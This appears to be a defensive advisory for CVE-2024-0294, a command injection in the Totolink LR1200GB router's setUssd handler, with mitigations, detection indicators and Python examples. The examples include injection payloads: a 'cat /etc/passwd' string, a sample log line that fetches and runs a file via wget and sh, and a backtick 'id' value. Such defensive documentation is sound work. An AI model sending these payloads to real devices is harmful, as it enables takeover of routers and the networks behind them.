CVE-2024-0294

7.3 HIGH

📋 TL;DR

This high-severity (CVSS 7.3) vulnerability in the Totolink LR1200GB router allows a remote attacker who can reach the web management interface to execute arbitrary operating system commands: the setUssd function of /cgi-bin/cstecgi.cgi passes the ussd parameter into an OS command without sanitization. Successful exploitation gives full control of the device. Firmware 9.1.0u.6619_B20230130 is the version confirmed affected.

💻 Affected Systems

Products:
  • Totolink LR1200GB
Versions: 9.1.0u.6619_B20230130 (the only firmware build confirmed affected; no other build is confirmed affected or unaffected)
Operating Systems: Embedded Linux (router firmware)
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerable handler is part of the stock web management interface. No special configuration is required; an attacker only needs network access to the interface (from the LAN, or from the WAN if remote management is enabled).

📦 What is this software?

The Totolink LR1200GB is a consumer dual-band wireless router with a built-in 4G LTE modem. Its web management interface is served through /cgi-bin/cstecgi.cgi; the setUssd function sends a USSD code (the *xxx# strings used for operations such as balance queries) to the cellular modem, which is where the unsanitized ussd parameter reaches an OS command.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete device compromise allowing attackers to install persistent backdoors, pivot to internal networks, intercept or redirect traffic passing through the router, or use the device for botnet activities.

🟠 Likely Case: Remote code execution leading to device takeover, credential theft from the router configuration, and reconnaissance of the network behind it.

🟢 If Mitigated: Limited impact if the management interface is not reachable from the WAN and the devices sit behind firewalls with strict inbound filtering and network segmentation.

🌐 Internet-Facing: HIGH - The vulnerability is remotely exploitable without authentication and public exploit code exists, so devices with remote (WAN-side) management enabled are immediate targets.
🏢 Internal Only: MEDIUM - Internal devices are still vulnerable to attackers who gain initial network access through other means.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit code is available on GitHub. The attack requires no authentication and is simple to execute.
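To make the flaw class concrete, the following is an added illustration and not the LR1200GB firmware's own code; the page states only that setUssd passes the ussd parameter into an OS command. The helper name at_ussd, the USSD allowlist pattern and the shell model are assumptions made for the example. It shows the vulnerable string-concatenation pattern beside the hardened form (allowlist validation plus an argv list executed without a shell).

```python
import re

# Added illustration of the flaw class behind this CVE; it is NOT the LR1200GB
# firmware's code. The helper name `at_ussd`, the allowlist pattern and the
# shell model below are assumptions made for the example.

# Assumed allowlist: a USSD code is digits with * and #, ending in # (e.g. *100#).
USSD_RE = re.compile(r"^[*#0-9]{1,60}#$")


def vulnerable_build(ussd: str) -> str:
    """Vulnerable pattern: concatenate untrusted input into a shell command line
    that is then handed to system()/popen()."""
    return f"at_ussd {ussd}"


def shell_would_run(cmdline: str) -> list[str]:
    """Model of what /bin/sh does with the line, used instead of invoking a
    shell: split on the command separators ; & | and drop empty parts. (It does
    not model `...` or $(...) substitution; those are injection vectors too.)"""
    return [part.strip() for part in re.split(r"[;&|]+", cmdline) if part.strip()]


def is_valid_ussd(ussd: str) -> bool:
    """Allowlist check: only characters that can appear in a USSD code."""
    return USSD_RE.fullmatch(ussd) is not None


def hardened_build(ussd: str) -> list[str]:
    """Hardened pattern: validate against the allowlist, then return an argv
    list to be run without a shell (subprocess.run(argv, shell=False) or
    execv), so the input can never become a second command."""
    if not is_valid_ussd(ussd):
        raise ValueError(f"rejected USSD code: {ussd!r}")
    return ["at_ussd", ussd]


if __name__ == "__main__":
    payload = "*100#;cat /etc/passwd"  # constructed injection payload
    print(shell_would_run(vulnerable_build(payload)))  # two commands
    print(hardened_build("*100#"))  # ['at_ussd', '*100#']
    try:
        hardened_build(payload)
    except ValueError as exc:
        print(exc)
```

The point of the hardened form is that both controls are needed: the allowlist rejects anything that is not a USSD code, and the argv list means that even a validation bypass never reaches a shell parser.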

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: N/A (no patch available)

Instructions:

No official patch is available and the vendor did not respond to disclosure attempts. Check the vendor's download page for a firmware build newer than 9.1.0u.6619_B20230130, but treat a newer build as unverified rather than fixed unless the vendor states that setUssd was corrected. Otherwise, apply the workarounds below or replace the affected devices.

🔧 Temporary Workarounds

Disable Remote (WAN-side) Web Management

all

The vulnerable endpoint is part of the web management interface, so the priority is to make that interface unreachable from the Internet. The web UI cannot be turned off entirely on a consumer router, since it is the only supported way to configure the device, and the LR1200GB does not ship with a documented SSH or Telnet CLI, so do not plan on applying changes that way.

Log in to the web management interface from the LAN
Open the remote management / WAN access settings
Disable remote (WAN) management, or restrict it to specific trusted source addresses if the firmware offers that option
Confirm from an external address that TCP ports 80 and 443 on the WAN IP no longer respond

Network Access Control

linux

Restrict access to the router's management interface with firewall rules. The rules below target the INPUT chain and therefore only take effect on the router itself, which requires a shell on the device; on an upstream Linux gateway that forwards traffic to the router, use the FORWARD chain with -d <router IP> instead. Rule order matters: the ACCEPT rules must precede the DROP rules, and the rules must be persisted (e.g. with iptables-save) or they are lost on reboot.

# Allow management only from one trusted host
iptables -A INPUT -p tcp --dport 80 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s TRUSTED_IP -j ACCEPT
# Drop everything else that reaches the web interface
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

🧯 If You Can't Patch

  • Isolate affected routers in a separate VLAN with strict network segmentation
  • Implement outbound traffic monitoring to detect command and control activity

🔍 How to Verify

Check if Vulnerable:

Compare the running firmware against 9.1.0u.6619_B20230130 in the web interface under System Status > Firmware Version. Note that cat /proc/version reports the Linux kernel build string, not the Totolink firmware version, and it requires a shell on the device, which the router does not normally provide.

Check Version:

Web interface: System Status > Firmware Version. If the router reports 9.1.0u.6619_B20230130, treat it as vulnerable. Because no fixed release has been published, a different version number does not by itself mean the setUssd handler has been corrected.

Verify Fix Applied:

Since there is no patch to verify, the check is on the workarounds: from an address outside the trusted set, and from the WAN side, confirm that /cgi-bin/cstecgi.cgi is unreachable. Do not send command-injection payloads to devices you do not own or have written authorization to test; a "harmless" injected command is still arbitrary command execution on the device.

📡 Detection & Monitoring

Log Indicators:

  • POST requests to /cgi-bin/cstecgi.cgi whose body references setUssd/ussd and whose ussd value contains shell metacharacters (; | & ` $ or newlines) rather than a plain *xxx# code
  • Any request to /cgi-bin/cstecgi.cgi arriving on the WAN interface, since management should never be reached from the Internet
  • Requests to setUssd from a source that never successfully authenticated to the web interface
  • Child processes of the web server (sh, wget, curl, busybox) in system logs, if you have process-level visibility (e.g. a syslog forwarder on the device)

Network Indicators:

  • Unusual outbound connections from router to unknown IPs
  • Traffic patterns indicating command and control communication
  • Port scanning originating from router

SIEM Query:

source="router_logs" AND ((uri="/cgi-bin/cstecgi.cgi" AND parameter="ussd") OR (parent_process="httpd" AND (process="sh" OR process="bash")))

The original form of this query mixed AND and OR without parentheses, so its evaluation order depended on the SIEM; the parentheses above make the intent explicit. The field names are generic placeholders to map onto your log source's schema, and the process-based clause only applies if the device (or a custom firmware) exports process events, which stock consumer routers do not.
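As an added detection example (not the page's own query and not vendor tooling), the following script applies the log indicators above to a batch of constructed log lines. It assumes an upstream reverse proxy, IDS or WAF in front of the router that records each request in a combined-log-like format with the POST body appended as body=...; the LR1200GB itself is not assumed to produce such logs. It extracts the ussd value from either a JSON or a form-encoded body before looking for shell metacharacters, so the & separators of a form body and percent-encoded metacharacters do not produce false positives or false negatives.

```python
import json
import re
from typing import Optional
from urllib.parse import parse_qs

# Added detection example, not the page's own query or any vendor tooling.
# Assumed log format: combined log line with the raw POST body after "body=".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) body=(?P<body>.*)$'
)
TARGET_PATH = "/cgi-bin/cstecgi.cgi"
# Characters that turn a USSD string into a second shell command.
SHELL_META_RE = re.compile(r"[;&|`$\n]")

# Constructed sample log lines (addresses from the RFC 5737 documentation ranges).
SAMPLE_LOGS = [
    '203.0.113.5 - - [12/Jan/2024:10:01:02 +0000] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 200 '
    'body={"topicurl":"setUssd","ussd":"*100#"}',
    '198.51.100.9 - - [12/Jan/2024:10:01:07 +0000] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 200 '
    'body={"topicurl":"setUssd","ussd":"*100#;wget http://198.51.100.9/x -O /tmp/x;sh /tmp/x"}',
    '192.0.2.7 - - [12/Jan/2024:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 body=',
    '198.51.100.9 - - [12/Jan/2024:10:02:30 +0000] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 200 '
    'body=topicurl=setUssd&ussd=*100%23%60id%60',
]


def extract_ussd(body: str) -> Optional[str]:
    """Pull the ussd value out of a JSON or form-encoded body. json.loads and
    parse_qs both decode escapes (\\u003b, %3B), so encoding cannot hide a
    metacharacter from the check that follows."""
    if body.lstrip().startswith("{"):
        try:
            data = json.loads(body)
        except ValueError:
            return None
        val = data.get("ussd") if isinstance(data, dict) else None
        return val if isinstance(val, str) else None
    return parse_qs(body, keep_blank_values=True).get("ussd", [None])[0]


def classify(line: str) -> Optional[dict]:
    """Return an alert dict for a ussd request to the vulnerable CGI, else None."""
    m = LOG_RE.match(line)
    if not m or m.group("path") != TARGET_PATH:
        return None
    ussd = extract_ussd(m.group("body"))
    if ussd is None:
        return None
    verdict = "injection" if SHELL_META_RE.search(ussd) else "ussd_request"
    return {"ip": m.group("ip"), "ts": m.group("ts"), "verdict": verdict, "ussd": ussd}


def scan(lines: list[str]) -> list[dict]:
    """Run classify() over a batch of log lines and keep only the hits."""
    return [a for a in (classify(line) for line in lines) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOGS):
        print(f"{alert['verdict']:12} {alert['ip']:15} {alert['ussd']}")
```

A plain ussd_request from a LAN address is normal traffic; the same verdict from a WAN-side source, or any injection verdict, is worth an alert on its own. Extend SHELL_META_RE if your environment sees other shell syntax, and bear in mind that the check only sees what the upstream device logs, so truncated bodies will be missed.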
